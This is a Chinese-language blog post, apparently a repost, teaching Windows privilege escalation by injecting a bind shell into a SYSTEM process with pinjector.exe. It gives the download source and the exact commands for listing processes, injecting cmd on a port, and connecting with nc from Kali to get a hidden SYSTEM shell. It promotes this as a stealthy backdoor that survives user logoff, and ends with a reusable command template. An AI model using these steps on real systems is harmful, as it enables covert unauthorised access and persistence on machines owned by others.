【提权】注入进程提权-白红宇

【提权】注入进程提权

阅读量：7103 次

发布时间：2019-06-28

本文共 1101 字，大约阅读时间需要 3 分钟。

注入进程提权【相当于开了一个后门，隐蔽性极高，不会创建新的进程，很难发现】

注入到system用户的进程，当管理员账户或其他账户注销后，后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行，进而同时拥有了对应的权限。

下面是图文教程。

0x01

从http://www.tarasco.org/security/Process_Injector/ 下载pinjector.exe文件。放在windows2003server的c盘根目录。

0x02将压缩包中的pinjector.exe提取出放在c盘根目录。

0x03执行pinjector.exe -l 可查看可以注入的进程。

可以看到不同的进程对应不同PID和用户。

0x04执行pinjector.exe -p 600 cmd 2345 注入进程pid为600的进程，使用端口2345返回cmd，执行成功后在任务管理器里并没有多出进程。

0x05使用kali的nc 192.168.70.135 2345

反弹shell并提权为system。

window.tctipConfig = {

staticPrefix: "http://static.tctip.com",

buttonImageId: 1,

buttonTip: "zanzhu",

list:{

alipay: {qrimg: "http://tctip.com/img/alipayqr.png"},

weixin:{qrimg: "http://littlebtc.com/images/yeshen.png"},

}

};

</script>

#####################################################################################################################

总结

将进程注入system服务进程

pinjector.exe进程注入器

{需要FQ下载}

###pinjector.exe -l#查看可注入进程

###pinjector.exe -p <PID> cmd <ports>

nc -nv <IP> <ports> //监听端口。成功后会反弹system的shell。

转载于:https://www.cnblogs.com/NBeveryday/p/6239351.html

你可能感兴趣的文章